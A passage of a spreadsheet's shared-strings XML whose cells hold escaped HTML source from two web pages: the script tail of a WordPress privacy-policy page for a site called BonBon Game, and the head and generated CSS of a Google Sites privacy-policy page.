	localeData[""].domain = domain;
	wp.i18n.setLocaleData( localeData, domain );
} )( "default", { "locale_data": { "messages": { "": {} } } } );
&lt;/script&gt;
&lt;script type="text/javascript" src="Privacy%20Policy%20%E2%80%93%20BonBon%20Game_files/api-fetch.js" id="wp-api-fetch-js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" id="wp-api-fetch-js-after"&gt;
wp.apiFetch.use( wp.apiFetch.createRootURLMiddleware( "http://bonbongame.com/wp-json/" ) );
wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware( "abe0c18f88" );
wp.apiFetch.use( wp.apiFetch.nonceMiddleware );
wp.apiFetch.use( wp.apiFetch.mediaUploadMiddleware );
wp.apiFetch.nonceEndpoint = "http://bonbongame.com/wp-admin/admin-ajax.php?action=rest-nonce";
&lt;/script&gt;
&lt;script type="text/javascript" id="contact-form-7-js-extra"&gt;
/* &lt;!</t>
  </si>
  <si>
    <t>[CDATA[ */
var wpcf7 = [];
/* ]]&gt; */
&lt;/script&gt;
&lt;script type="text/javascript" src="Privacy%20Policy%20%E2%80%93%20BonBon%20Game_files/index.js" id="contact-form-7-js"&gt;&lt;/script&gt;
&lt;script type="text/javas</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang="en-US" itemscope itemtype="http://schema.org/WebPage"&gt;&lt;head&gt;&lt;meta charset="utf-8"&gt;&lt;script nonce="nZBw6YsMHYDGnl1zeVnFDA"&gt;var DOCS_timing={}; DOCS_timing['sl']=new Date().getTime();&lt;/script&gt;&lt;script nonce="nZBw6YsMHYDGnl1zeVnFDA"&gt;function _DumpException(e) {throw e;}&lt;/script&gt;&lt;script nonce="nZBw6YsMHYDGnl1zeVnFDA"&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1Hm5--CHMJcXc-rQIrskSChgfC-BXDlJIZaH-mb0c84XDZarn5jrI66M4AW4x2yRkY-FK7","je":1,"sstu":1681340077319795,"si":"CPrLuPC3pf4CFQ51awodi_QM_g","gsc":null,"ei":[5703839,5704621,5706832,5706836,5707711,5735806,5737441,5737800,5738529,5740814,5743124,5746993,5747265,5748029,5752694,5753329,5754229,5754594,5760348,5760827,5762729,5764268,5765551,5766777,5770435,5773678,5774347,5776517,5776917,5777194,5786303,14101306,14101502,14101510,14101534,49369425,49372443,49375322,49376001,49378889,49451559,49453045,49472071,49474087,49512373,49622831,49623181,49624080,49644023,49648914,49654053,49700904,49765382,49816165,49822929,49839579,49842863,49898325,49924714,50022334,50127540,50166959,50168315,50174666,50263472,50291080,50313182,50322323,50347752,50455861,50468101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href="https://ssl.gstatic.com/atari/images/public/favicon.ico"&gt;&lt;meta name="robots" content="noindex"&gt;&lt;meta property="og:title" content="Home"&gt;&lt;meta property="og:type" content="website"&gt;&lt;meta property="og:url" content="https://sites.google.com/view/fpg-ent-privacy-policy"&gt;&lt;meta property="og:description" content="
Privacy Policy"&gt;&lt;meta itemprop="name" content="Home"&gt;&lt;meta itemprop="description" content="
Privacy Policy"&gt;&lt;meta itemprop="url" content="https://sites.google.com/view/fpg-ent-privacy-policy"&gt;&lt;link href="https://fonts.googleapis.com/</t>
  </si>
  <si>
    <t>css?family=Lato%3A300%2C300italic%2C400%2C400italic%2C700%2C700italic&amp;display=swap" rel="stylesheet" nonce="5sjoelfMFdBzpd5G0e289g"&gt;&lt;link href="https://fonts.googleapis.com/ css?family=Google+Sans:400,500|Roboto:300,400,500,700|Source+Code+Pro:400,700&amp;display=swap" rel="stylesheet" nonce="5sjoelfMFdBzpd5G0e289g"&gt;&lt;link rel="stylesheet" href="https://www.gstatic.com/_/atari/_/ss/k=atari.vw.jffPnSbrV38.L.X.O/d=1/rs=AGEqA5liTY9eJ3KZzwxTWsMzfIyQn11GcQ" data-id="_cl" nonce="5sjoelfMFdBzpd5G0e289g"&gt;&lt;script nonce="nZBw6YsMHYDGnl1zeVnFDA"&gt;&lt;/script&gt;&lt;title&gt;Home&lt;/title&gt;&lt;style jsname="ptDGoc" nonce="5sjoelfMFdBzpd5G0e289g"&gt;.M63kCb{background-color: rgba(255,255,255,1);}.OUGEr{color: rgba(33,33,33,1);}.duRjpb .OUGEr{color: rgba(34,110,147,1);}.JYVBee .OUGEr{color:</t>
  </si>
  <si>
    <t>rgba(34,110,147,1);}.OmQG5e .OUGEr{color: rgba(33,33,33,1);}.iwQgFb{background-color: rgba(0,0,0,0.150000006);}.ySLm4c{font-family: Lato, sans-serif;}.CbiMKe{background-color: rgba(30,108,147,1);}.qeLZfd .zfr3Q{color: rgba(33,33,33,1);}.qeLZfd .qnVSj{color: rgba(33,33,33,1);}.qeLZfd .Glwbz{color: rgba(33,33,33,1);}.qeLZfd .duRjpb{color:</t>
  </si>
  <si>
    <t>rgba(34,110,147,1);}.qeLZfd .qLrapd{color: rgba(34,110,147,1);}.qeLZfd .JYVBee{color: rgba(34,110,147,1);}.qeLZfd .aHM7ed{color: rgba(34,110,147,1);}.qeLZfd .OmQG5e{color: rgba(33,33,33,1);}.qeLZfd .NHD4Gf{color:</t>
  </si>
  <si>
    <t>rgba(33,33,33,1);}.qeLZfd .aw5Odc{color: rgba(0,101,128,1);}.qeLZfd .dhtgD:hover{color: rgba(0,0,0,1);}.qeLZfd .dhtgD:visited{color: rgba(0,101,128,1);}.qeLZfd .iwQgFb{background-color: rgba(0,0,0,0.150000006);}.qeLZfd .OUGEr{color: rgba(33,33,33,1);}.qeLZfd .duRjpb .OUGEr{color:</t>
  </si>
  <si>
    <t>rgba(34,110,147,1);}.qeLZfd .JYVBee .OUGEr{color: rgba(34,110,147,1);}.qeLZfd .OmQG5e .OUGEr{color: rgba(33,33,33,1);}.qeLZfd:before{background-color: rgba(242,242,242,1); display: block;}.lQAHbd .zfr3Q{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.lQAHbd .qnVSj{color: rgba(255,255,255,1);}.lQAHbd .Glwbz{color: rgba(255,255,255,1);}.lQAHbd .duRjpb{color: rgba(255,255,255,1);}.lQAHbd .qLrapd{color: rgba(255,255,255,1);}.lQAHbd .JYVBee{color: rgba(255,255,255,1);}.lQAHbd .aHM7ed{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.lQAHbd .OmQG5e{color: rgba(255,255,255,1);}.lQAHbd .NHD4Gf{color: rgba(255,255,255,1);}.lQAHbd .aw5Odc{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.lQAHbd .dhtgD:hover{color: rgba(255,255,255,1);}.lQAHbd .dhtgD:visited{color: rgba(255,255,255,1);}.lQAHbd .iwQgFb{background-color: rgba(255,255,255,0.150000006);}.lQAHbd .OUGEr{color: rgba(255,255,255,1);}.lQAHbd .duRjpb .OUGEr{color: rgba(255,255,255,1);}.lQAHbd .JYVBee .OUGEr{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.lQAHbd .OmQG5e .OUGEr{color: rgba(255,255,255,1);}.lQAHbd .CbiMKe{background-color: rgba(255,255,255,1);}.lQAHbd:before{background-color: rgba(30,108,147,1); display: block;}.cJgDec .zfr3Q{color: rgba(255,255,255,1);}.cJgDec .zfr3Q .OUGEr{color</t>
  </si>
  <si>
    <t>: rgba(255,255,255,1);}.cJgDec .qnVSj{color: rgba(255,255,255,1);}.cJgDec .Glwbz{color: rgba(255,255,255,1);}.cJgDec .qLrapd{color: rgba(255,255,255,1);}.cJgDec .aHM7ed{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.cJgDec .NHD4Gf{color: rgba(255,255,255,1);}.cJgDec .IFuOkc:before{background-color: rgba(33,33,33,1); opacity: 0; display: block;}.O13XJf{height: 340px; padding-bottom: 60px; padding-top: 60px;}.O13XJf .IFuOkc{background-color: rgba(34,110,147,1); background-image: url(https://ssl.gstatic.com/atari/images/simple-header-blended-small.png);}.O13XJf .IFuOkc:before{background-color: rgba(33,33,33,1); opacity: 0.4; display: block;}.O13XJf .zfr3Q{color: rgba(255,255,255,1);}.O13XJf .qnVSj{color: rgba(255,255,255,1);}.O13XJf .Glwbz{color: rgba(255,255,255,1);}.O13XJf .duRjpb{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.O13XJf .qLrapd{color: rgba(255,255,255,1);}.O13XJf .JYVBee{color: rgba(255,255,255,1);}.O13XJf .aHM7ed{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.O13XJf .OmQG5e{color: rgba(255,255,255,1);}.O13XJf .NHD4Gf{color: rgba(255,255,255,1);}.tpmmCb .zfr3Q{color: rgba(33,33,33,1);}.tpmmCb .zfr3Q .OUGEr{color</t>
  </si>
  <si>
    <t>: rgba(33,33,33,1);}.tpmmCb .qnVSj{color: rgba(33,33,33,1);}.tpmmCb .Glwbz{color: rgba(33,33,33,1);}.tpmmCb .qLrapd{color: rgba(33,33,33,1);}.tpmmCb .aHM7ed{color: rgba(33,33,33,1);}.tpmmCb .NHD4Gf{color: rgba(33,33,33,1);}.tpmmCb .IFuOkc:before{background-color: rgba(255,255,255,1); display: block;}.tpmmCb .Wew9ke{fill: rgba(33,33,33,1);}.aw5Odc{color: rgba(0,101,128,1);}.dhtgD:hover{color: rgba(0,122,147,1);}.dhtgD:active{color: rgba(0,122,147,1);}.dhtgD:visited{color: rgba(0,101,128,1);}.Zjiec{color: rgba(255,255,255,1); font-family: Lato, sans-serif; font-size: 19pt; font-weight: 300; letter-spacing: 1px; line-height: 1.3; padding-bottom: 62.5px; padding-left: 48px; padding-right: 36px; padding-top: 11.5px;}.XMyrgf{margin-top: 0px; margin-left: 48px; margin-bottom: 24px; margin-right: 24px;}.TlfmSc{color: rgba(255,255,255,1); font-family: Lato, sans-serif; font-size: 15pt; font-weight: 300; line-height: 1.333;}.Mz8gvb{color: rgba(255,255,255,1);}.zDUgLc{background-color: rgba(33,33,33,1);}.QTKDff.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}.YTv4We{color: rgba(178,178,178,1);}.YTv4We:hover:before{background-color: rgba(255,255,255,0.1199999973); display: block;}.YTv4We.chg4Jd:focus:before{border-color: rgba(255,255,255,0.3600000143); display: block;}.eWDljc{background-color: rgba(33,33,33,1);}.eWDljc .hDrhEe{padding-left: 8px;}.ZXW7w{color: rgba(255,255,255,1); opacity: 0.26;}.PsKE7e{color: rgba(255,255,255,1); font-family: Lato, sans-serif; font-size: 12pt; font-weight: 300;}.lhZOrc{color: rgba(73,170,212,1);}.hDrhEe:hover{color: rgba(73,170,212,1);}.M9vuGd{color: rgba(73,170,212,1); font-weight: 400;}.jgXgSe:hover{color: rgba(73,170,212,1);}.j10yRb:hover{color: rgba(0,188,212,1);}.j10yRb.chg4Jd:focus:before{border-color: rgba(255,255,255,0.3600000143); display: block;}.tCHXDc{color: rgba(255,255,255,1);}.iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}.wgxiMe{background-color: rgba(33,33,33,1);}.fOU46b .TlfmSc{color: rgba(255,255,255,1);}.fOU46b .KJll8d{background-color: rgba(255,255,255,1);}.fOU46b .Mz8gvb{color: rgba(255,255,255,1);}.fOU46b .Mz8gvb.chg4Jd:focus:before{border-color: rgba(255,255,255,1); display: block;}.fOU46b .qV4dIc{color: rgba(255,255,255,0.8700000048);}.fOU46b .jgXgSe:hover{color: rgba(255,255,255,1);}.fOU46b .M9vuGd{color: rgba(255,255,255,1);}.fOU46b .tCHXDc{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,0.8700000048);}.fOU46b .iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}.fOU46b .G8QRnc .Mz8gvb{color: rgba(0,0,0,0.8000000119);}.fOU46b .G8QRnc</t>
  </si>
  <si>
    <t>.Mz8gvb.chg4Jd:focus:before{border-color: rgba(0,0,0,0.8000000119); display: block;}.fOU46b .G8QRnc .ZXW7w{color: rgba(0,0,0,0.8000000119);}.fOU46b .G8QRnc</t>
  </si>
  <si>
    <t>.TlfmSc{color: rgba(0,0,0,0.8000000119);}.fOU46b .G8QRnc .KJll8d{background-color: rgba(0,0,0,0.8000000119);}.fOU46b .G8QRnc</t>
  </si>
  <si>
    <t>.qV4dIc{color: rgba(0,0,0,0.6399999857);}.fOU46b .G8QRnc .jgXgSe: hover{color: rgba(0,0,0,0.8199999928);}.fOU46b .G8QRnc .M9vuGd{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,0.8199999928);}.fOU46b .G8QRnc .tCHXDc{color: rgba(0,0,0,0.6399999857);}.fOU46b .G8QRnc</t>
  </si>
  <si>
    <t>.iWs3gf.chg4Jd:focus{background-color: rgba(0,0,0,0.1199999973);}.fOU46b .usN8rf .Mz8gvb{color: rgba(0,0,0,0.8000000119);}.fOU46b .usN8rf .Mz8gvb.chg4Jd:focus:before{border-color: rgba(0,0,0,0.8000000119); display: block;}.fOU46b .usN8rf</t>
  </si>
  <si>
    <t>.ZXW7w{color: rgba(0,0,0,0.8000000119);}.fOU46b .usN8rf .TlfmSc{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,0.8000000119);}.fOU46b .usN8rf .KJll8d{background-color: rgba(0,0,0,0.8000000119);}.fOU46b .usN8rf .qV4dIc{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,0.6399999857);}.fOU46b .usN8rf .jgXgSe:hover{color: rgba(0,0,0,0.8199999928);}.fOU46b .usN8rf .M9vuGd{color: rgba(0,0,0,0.8199999928);}.fOU46b .usN8rf .tCHXDc{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,0.6399999857);}.fOU46b .usN8rf .iWs3gf.chg4Jd:focus{background-color: rgba(0,0,0,0.1199999973);}.fOU46b .aCIEDd .qV4dIc{color: rgba(33,33,33,1);}.fOU46b .aCIEDd</t>
  </si>
  <si>
    <t>.TlfmSc{color: rgba(33,33,33,1);}.fOU46b .aCIEDd .KJll8d{background-color: rgba(33,33,33,1);}.fOU46b .aCIEDd .ZXW7w{color:</t>
  </si>
  <si>
    <t>rgba(33,33,33,1);}.fOU46b .aCIEDd .jgXgSe : hover{color: rgba(33,33,33,1); opacity: 0.82;}.fOU46b .aCIEDd .Mz8gvb{color:</t>
  </si>
  <si>
    <t>rgba(33,33,33,1);}.fOU46b .aCIEDd .tCHXDc{color: rgba(33,33,33,1);}.fOU46b .aCIEDd .iWs3gf.chg4Jd:focus{background-color:</t>
  </si>
  <si>
    <t>rgba(33,33,33,0.1199999973);}.fOU46b .a3ETed .qV4dIc{color: rgba(255,255,255,1);}.fOU46b .a3ETed .TlfmSc{color: rgba(255,255,255,1);}.fOU46b .a3ETed .KJll8d{background-color: rgba(255,255,255,1);}.fOU46b .a3ETed .ZXW7w{color: rgba(255,255,255,1);}.fOU46b .a3ETed .jgXgSe:hover{color: rgba(255,255,255,1); opacity: 0.82;}.fOU46b</t>
  </si>
  <si>
    <t>.a3ETed .Mz8gvb{color: rgba(255,255,255,1);}.fOU46b .a3ETed .tCHXDc{color: rgba(255,255,255,1);}.fOU46b .a3ETed .iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}@media only screen and (min-width: 1280px){.XeSM4.b2Iqye.fOU46b .LBrwzc .tCHXDc{color: rgba(255,255,255,0.8700000048);}}.XeSM4.b2Iqye.fOU46b .LBrwzc</t>
  </si>
  <si>
    <t>.iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}@media only screen and (min-width: 1280px){.KuNac.b2Iqye.fOU46b .tCHXDc{color: rgba(0,0,0,0.6399999857);}}.KuNac.b2Iqye.fOU46b .iWs3gf.chg4Jd: focus{background-color: rgba(0,0,0,0.1199999973);}.fOU46b .zDUgLc{opacity:</t>
  </si>
  <si>
    <t>0;}.LBrwzc .ZXW7w{color: rgba(0,0,0,1);}.LBrwzc .KJll8d{background-color: rgba(0,0,0,1);}.GBy4H .ZXW7w{color: rgba(255,255,255,1);}.GBy4H .KJll8d{background-color: rgba(255,255,255,1);}.eBSUbc{background-color: rgba(33,33,33,1); color: rgba(0,188,212,0.6999999881);}.BFDQOb:hover{color: rgba(73,170,212,1);}.ImnMyf{background-color: rgba(255,255,255,1); color: rgba(33,33,33,1);}.Vs12Bd{background-color: rgba(242,242,242,1); color: rgba(33,33,33,1);}.S5d9Rd{background-color: rgba(30,108,147,1); color: rgba(255,255,255,1);}.zfr3Q{color: rgba(33,33,33,1); font-family: Lato, sans-serif; font-size: 11pt; font-weight: 400; line-height: 1.6667; margin-top: 12px;}.qnVSj{color: rgba(33,33,33,1);}.Glwbz{color: rgba(33,33,33,1);}.duRjpb{color: rgba(34,110,147,1); font-family: Lato, sans-serif; font-size: 34pt; font-weight: 300; letter-spacing: 0.5px; line-height: 1.2; margin-top: 30px;}.Ap4VC{margin-bottom: -30px;}.qLrapd{color: rgba(34,110,147,1);}.JYVBee{color: rgba(34,110,147,1); font-family: Lato, sans-serif; font-size: 19pt; font-weight: 400; line-height: 1.4; margin-top: 20px;}.CobnVe{margin-bottom: -20px;}.aHM7ed{color: rgba(34,110,147,1);}.OmQG5e{color: rgba(33,33,33,1); font-family: Lato, sans-serif; font-size: 15pt; font-style: normal; font-weight: 400; line-height: 1.25; margin-top: 16px;}.GV3q8e{margin-bottom: -16px;}.NHD4Gf{color: rgba(33,33,33,1);}.LB7kq .duRjpb{font-size: 64pt; letter-spacing: 2px; line-height: 1; margin-top: 40px;}.LB7kq .JYVBee{font-size: 25pt; font-weight: 300; line-height: 1.1; margin-top: 25px;}@media only screen and (max-width: 479px){.LB7kq .duRjpb{font-size: 40pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.LB7kq .duRjpb{font-size: 53pt;}}@media only screen and (max-width: 479px){.LB7kq .JYVBee{font-size: 19pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.LB7kq .JYVBee{font-size: 22pt;}}.O13XJf{height: 340px; padding-bottom: 60px; padding-top: 60px;}@media only screen and (min-width: 480px) and (max-width: 767px){.O13XJf{height: 280px; padding-bottom: 40px; padding-top: 40px;}}@media only screen and (max-width: 479px){.O13XJf{height: 250px; padding-bottom: 30px; padding-top: 30px;}}.SBrW1{height: 520px;}@media only screen and (min-width: 480px) and (max-width: 767px){.SBrW1{height: 520px;}}@media only screen and (max-width: 479px){.SBrW1{height: 400px;}}.Wew9ke{fill: rgba(255,255,255,1);}.gk8rDe{height: 180px; padding-bottom: 32px; padding-top: 60px;}.gk8rDe .zfr3Q{color: rgba(0,0,0,1);}.gk8rDe</t>
  </si>
  <si>
    <t>.duRjpb{color: rgba(34,110,147,1); font-size: 45pt; line-height: 1.1;}.gk8rDe .qLrapd{color: rgba(34,110,147,1);}.gk8rDe .JYVBee{color: rgba(34,110,147,1); font-size: 27pt; line-height: 1.35; margin-top: 15px;}.gk8rDe .aHM7ed{color: rgba(34,110,147,1);}.gk8rDe .OmQG5e{color: rgba(33,33,33,1);}.gk8rDe .NHD4Gf{color:</t>
  </si>
  <si>
    <t>rgba(33,33,33,1);}@media only screen and (max-width: 479px){.gk8rDe .duRjpb{font-size: 30pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.gk8rDe .duRjpb{font-size: 38pt;}}@media only screen and (max-width:</t>
  </si>
  <si>
    <t>479px){.gk8rDe .JYVBee{font-size: 20pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.gk8rDe .JYVBee{font-size: 24pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.gk8rDe{padding-top: 45px;}}@media only screen and (max-width: 479px){.gk8rDe{padding-bottom: 0px; padding-top: 30px;}}.dhtgD{text-decoration: underline;}.JzO0Vc{background-color: rgba(33,33,33,1); font-family: Lato, sans-serif; width: 250px;}@media only screen and (min-width: 1280px){.JzO0Vc{padding-top: 48.5px;}}.TlfmSc{font-family: Lato, sans-serif; font-size: 15pt; font-weight: 300; line-height: 1.333;}.PsKE7e{font-family: Lato, sans-serif; font-size: 12pt;}.IKA38e{line-height: 1.21;}.hDrhEe{padding-bottom: 11.5px; padding-top: 11.5px;}.zDUgLc{opacity: 1;}.QmpIrf{background-color: rgba(30,108,147,1); border-color: rgba(255,255,255,1)</t>
  </si>
  <si>
    <t>; color: rgba(255,255,255,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.xkUom{border-color: rgba(30,108,147,1); color: rgba(30,108,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.xkUom:hover{background-color: rgba(30,108,147,0.1000000015);}.KjwKmc{color: rgba(30,108,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal; line-height: normal;}.KjwKmc:hover{background-color: rgba(30,108,147,0.1000000015);}.lQAHbd .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(34,110,147,1); color: rgba(34,110,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.lQAHbd .xkUom{border-color: rgba(242,242,242,1); color: rgba(242,242,242,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.lQAHbd .xkUom: hover{background-color: rgba(255,255,255,0.1000000015);}.lQAHbd .KjwKmc{color: rgba(242,242,242,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.lQAHbd .KjwKmc:hover{background-color: rgba(255,255,255,0.1000000015);}.lQAHbd .Mt0nFe{border-color: rgba(255,255,255,0.200000003);}.cJgDec .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(34,110,147,1); color: rgba(34,110,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.cJgDec .xkUom{border-color: rgba(242,242,242,1); color: rgba(242,242,242,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.cJgDec .xkUom :</t>
  </si>
  <si>
    <t>hover{background-color: rgba(255,255,255,0.1000000015);}.cJgDec .KjwKmc{color: rgba(242,242,242,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.cJgDec .KjwKmc:hover{background-color: rgba(255,255,255,0.1000000015);}.tpmmCb .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(34,110,147,1); color: rgba(34,110,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.tpmmCb .xkUom{border-color: rgba(30,108,147,1); color: rgba(30,108,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.tpmmCb .xkUom:hover{background-color: rgba(30,108,147,0.1000000015);}.tpmmCb .KjwKmc{color: rgba(30,108,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.tpmmCb .KjwKmc:hover{background-color: rgba(30,108,147,0.1000000015);}.gk8rDe .QmpIrf{background-color: rgba(30,108,147,1); border-color: rgba(255,255,255,1); color: rgba(255,255,255,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.gk8rDe .xkUom{border-color: rgba(30,108,147,1); color: rgba(30,108,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.gk8rDe .xkUom:hover{background-color: rgba(30,108,147,0.1000000015);}.gk8rDe .KjwKmc{color: rgba(30,108,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.gk8rDe .KjwKmc:hover{background-color: rgba(30,108,147,0.1000000015);}.O13XJf .QmpIrf{background-color: rgba(255,255,255,1); border-color: rgba(34,110,147,1); color: rgba(34,110,147,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.O13XJf .xkUom{border-color: rgba(242,242,242,1); color: rgba(242,242,242,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.O13XJf .xkUom:hover{background-color: rgba(255,255,255,0.1000000015);}.O13XJf .KjwKmc{color: rgba(242,242,242,1); font-family: Lato, sans-serif; font-size: 11pt; line-height: normal;}.O13XJf .KjwKmc:hover{background-color: rgba(255,255,255,0.1000000015);}.Y4CpGd{font-family: Lato, sans-serif; font-size: 11pt;}.CMArNe{background-color: rgba(242,242,242,1);}.LBrwzc .TlfmSc{color: rgba(0,0,0,0.8000000119);}.LBrwzc .YTv4We{color</t>
  </si>
  <si>
    <t>: rgba(0,0,0,0.6399999857);}.LBrwzc .YTv4We.chg4Jd:focus:before{border-color: rgba(0,0,0,0.6399999857); display: block;}.LBrwzc .Mz8gvb{color: rgba(0,0,0,0.6399999857);}.LBrwzc .tCHXDc{color: rgba(0,0,0,0.6399999857);}.LBrwzc</t>
  </si>
  <si>
    <t>.iWs3gf.chg4Jd:focus{background-color: rgba(0,0,0,0.1199999973);}.LBrwzc .wgxiMe{background-color: rgba(255,255,255,1);}.LBrwzc .qV4dIc{color: rgba(0,0,0,0.6399999857);}.LBrwzc .M9vuGd{color: rgba(0,0,0,0.8000000119); font-weight: bold;}.LBrwzc .Zjiec{color: rgba(0,0,0,0.8000000119);}.LBrwzc .IKA38e{color: rgba(0,0,0,0.6399999857);}.LBrwzc .lhZOrc. IKA38e{color: rgba(0,0,0,0.8000000119); font-weight: bold;}.LBrwzc .j10yRb:hover{color: rgba(0,0,0,0.8000000119);}.LBrwzc .eBSUbc{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,0.8000000119);}.LBrwzc .hDrhEe :hover{color: rgba(0,0,0,0.8000000119);}.LBrwzc .jgXgSe :</t>
  </si>
  <si>
    <t>hover{color: rgba(0,0,0,0.8000000119);}.LBrwzc .M9vuGd : hover{color: rgba(0,0,0,0.8000000119);}.LBrwzc .zDUgLc{border-bottom-color: rgba(204,204,204,1); border-bottom-width: 1px; border-bottom-style: solid;}.fOU46b .LBrwzc</t>
  </si>
  <si>
    <t>.M9vuGd{color: rgba(0,0,0,0.8000000119);}.fOU46b .LBrwzc .jgXgSe :</t>
  </si>
  <si>
    <t>hover{color: rgba(0,0,0,0.8000000119);}.fOU46b .LBrwzc .zDUgLc{opacity: 1; border-bottom-style: none;}.fOU46b .LBrwzc .tCHXDc{color:</t>
  </si>
  <si>
    <t>rgba(0,0,0,0.6399999857);}.fOU46b .LBrwzc .iWs3gf.chg4Jd:focus{background-color: rgba(0,0,0,0.1199999973);}.fOU46b .GBy4H .M9vuGd{color: rgba(255,255,255,1);}.fOU46b .GBy4H .jgXgSe :</t>
  </si>
  <si>
    <t>hover{color: rgba(255,255,255,1);}.fOU46b .GBy4H .zDUgLc{opacity: 1;}.fOU46b .GBy4H .tCHXDc{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,0.8700000048);}.fOU46b .GBy4H .iWs3gf.chg4Jd: focus{background-color: rgba(255,255,255,0.1199999973);}.XeSM4.G9Qloe.fOU46b .LBrwzc .tCHXDc{color: rgba(0,0,0,0.6399999857);}.XeSM4.G9Qloe.fOU46b .LBrwzc</t>
  </si>
  <si>
    <t>.iWs3gf.chg4Jd:focus{background-color: rgba(0,0,0,0.1199999973);}.GBy4H .lhZOrc. IKA38e{color: rgba(255,255,255,1);}.GBy4H .eBSUbc{color: rgba(255,255,255,0.8700000048);}.GBy4H .hDrhEe:hover{color: rgba(255,255,255,1);}.GBy4H .j10yRb:hover{color: rgba(255,255,255,1);}.GBy4H .YTv4We{color:</t>
  </si>
  <si>
    <t>rgba(255,255,255,1);}.GBy4H .YTv4We.chg4Jd:focus:before{border-color: rgba(255,255,255,1); display: block;}.GBy4H .tCHXDc{color: rgba(255,255,255,0.8700000048);}.GBy4H .iWs3gf.chg4Jd:focus{background-color: rgba(255,255,255,0.1199999973);}.GBy4H .jgXgSe:hover{color: rgba(255,255,255,1);}.GBy4H .jgXgSe:hover{color: rgba(255,255,255,1);}.GBy4H .M9vuGd{color: rgba(255,255,255,1);}.GBy4H .M9vuGd:hover{color: rgba(255,255,255,1);}.QcmuFb{padding-left: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200px;}.TMjjoe{font-family: Lato, sans-serif; font-size:</t>
  </si>
  <si>
    <t>9pt; line-height: 1.2; margin-top: 0px;}@media only screen and (min-width: 1280px){.yxgWrb{margin-left: 250px;}}@media only screen and (max-width: 479px){.Zjiec{font-size: 15pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.Zjiec{font-size: 17pt;}}@media only screen and (max-width: 479px){.TlfmSc{font-size: 13pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.TlfmSc{font-size: 14pt;}}@media only screen and (max-width: 479px){.PsKE7e{font-size: 12pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.PsKE7e{font-size: 12pt;}}@media only screen and (max-width: 479px){.duRjpb{font-size: 24pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.duRjpb{font-size: 29pt;}}@media only screen and (max-width: 479px){.JYVBee{font-size: 15pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.JYVBee{font-size: 17pt;}}@media only screen and (max-width: 479px){.OmQG5e{font-size: 13pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.OmQG5e{font-size: 14pt;}}@media only screen and (max-width: 479px){.TlfmSc{font-size: 13pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.TlfmSc{font-size: 14pt;}}@media only screen and (max-width: 479px){.PsKE7e{font-size: 12pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.PsKE7e{font-size: 12pt;}}@media only screen and (max-width: 479px){.TMjjoe{font-size: 9pt;}}@media only screen and (min-width: 480px) and (max-width: 767px){.TMjjoe{font-size: 9pt;}}section[id="h.p_vJQTkVeCxc7r"] .IFuOkc:before{opacity: 0.6;}&lt;/style&gt;&lt;script</t>
  </si>
  <si>
